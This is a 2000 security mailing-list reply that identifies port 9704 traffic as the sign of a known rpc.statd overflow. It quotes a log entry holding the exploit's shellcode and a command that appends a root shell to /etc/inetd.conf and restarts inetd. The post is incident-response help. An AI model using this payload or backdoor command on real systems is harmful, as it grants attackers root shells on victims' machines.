Security Incidents mailing list archives
Re: Port 9704
From: Graeme Fowler <graeme.f () WEBFUSION CO UK>
Date: Thu, 12 Oct 2000 09:45:18 +0100
Derek K wrote:
I'm seeing a lot of traffic from 2 mailservers - it's going out on
port
9704 and going in on another box's 9704. I'm suspicious, and don't
find
any references to it around. The 9704->9704 makes me wonder if it
isn't a
hack of some kind.
Yup. 9704 is the port added to inetd by a pretty well-known overflow for rpc.statd: Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00bffff7 0400000000000000000000000000000000000000000000000bffff7050000bffff706000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90 <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 <90><90 <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83>
<8D>^( <83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 1<83> <88>F'<88>F*<83> <88>F<89>F+, <89><8D>N<8D>V<80>1<89>@<80>/bin /sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd ...and BONK! they have a rootshell running on 9704. See http://www.securityfocus.com/bid/1480 I'd let the owners know, pronto. Alternatively if you have any control over them, get them unplugged. Regards Graeme
Current thread:
- Port 9704 Derek K. (Oct 11)
- Re: Port 9704 Harry Behrens (Oct 12)
- Re: Port 9704 Graeme Fowler (Oct 12)
- Re: Port 9704 Jose Nazario (Oct 12)